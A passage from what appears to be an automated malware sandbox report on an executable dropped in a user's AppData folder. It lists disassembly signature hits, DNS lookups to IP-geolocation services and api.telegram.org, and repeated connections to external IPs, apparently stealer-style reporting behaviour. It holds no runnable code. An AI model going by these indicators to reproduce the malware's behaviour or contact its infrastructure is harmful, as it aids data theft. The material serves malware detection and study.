                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 0071EEAAh9_2_0071EBB0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 0071989Ah9_2_007195A0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00716C7Ah9_2_007169A8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00712C69h9_2_00712998
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00714C51h9_2_00714980
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 0071B082h9_2_0071AD88
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008B3C9Ah9_2_008B39A0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008B297Bh9_2_008B2680
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008B1192h9_2_008B0E98
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008B37D2h9_2_008B34D8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008B1FEAh9_2_008B1CF0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008B330Ah9_2_008B3010
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008B1B22h9_2_008B1828
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008B033Ah9_2_008B0040
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008B4162h9_2_008B3E68
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008B24B2h9_2_008B21B8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008B0CCAh9_2_008B09D0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008B0802h9_2_008B0508
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008B2E42h9_2_008B2B48
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008B165Ah9_2_008B1360
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D5A31h9_2_008D5788
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DE1C5h9_2_008DDE88
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DD429h9_2_008DD180
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D4D29h9_2_008D4A80
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D7441h9_2_008D7198
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D6739h9_2_008D6490
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DF579h9_2_008DF2A8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D8E51h9_2_008D8BA8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D8149h9_2_008D7EA0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D9B59h9_2_008D98B0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D3771h9_2_008D34C8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DBE71h9_2_008DBBC8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DB169h9_2_008DAEC0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D5181h9_2_008D4ED8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DD881h9_2_008DD5D8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DCB7Bh9_2_008DC8D0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D4479h9_2_008D41D0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D6B91h9_2_008D68E8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D5E89h9_2_008D5BE0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DE7B1h9_2_008DE4E0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D85A1h9_2_008D82F8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D7899h9_2_008D75F0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D92A9h9_2_008D9000
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DB5C1h9_2_008DB318
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DF0E1h9_2_008DEE10
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DCFD1h9_2_008DCD28
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D48D1h9_2_008D4628
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DC2C9h9_2_008DC020
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D3BC9h9_2_008D3920
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D62E1h9_2_008D6038
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D55D9h9_2_008D5330
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DDCD9h9_2_008DDA30
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D7CF1h9_2_008D7A48
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DFA11h9_2_008DF740
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D6FE9h9_2_008D6D40
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D9701h9_2_008D9458
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D89F9h9_2_008D8750
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DAD11h9_2_008DAA68
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D4021h9_2_008D3D78
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DC721h9_2_008DC478
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DEC49h9_2_008DE978
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DBA19h9_2_008DB770
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D3319h9_2_008D3070
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]9_2_00942AF9
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]9_2_00942B00
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]9_2_00945F38
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]9_2_00945F28
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: api.telegram.org
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 132.226.247.73:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 132.226.247.73:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 132.226.247.73:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 193.122.130.0:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 158.101.44.242:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 193.122.6.168:80
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.122.130.0:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 132.226.8.169:80
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 132.226.8.169:80
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 193.122.6.168:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
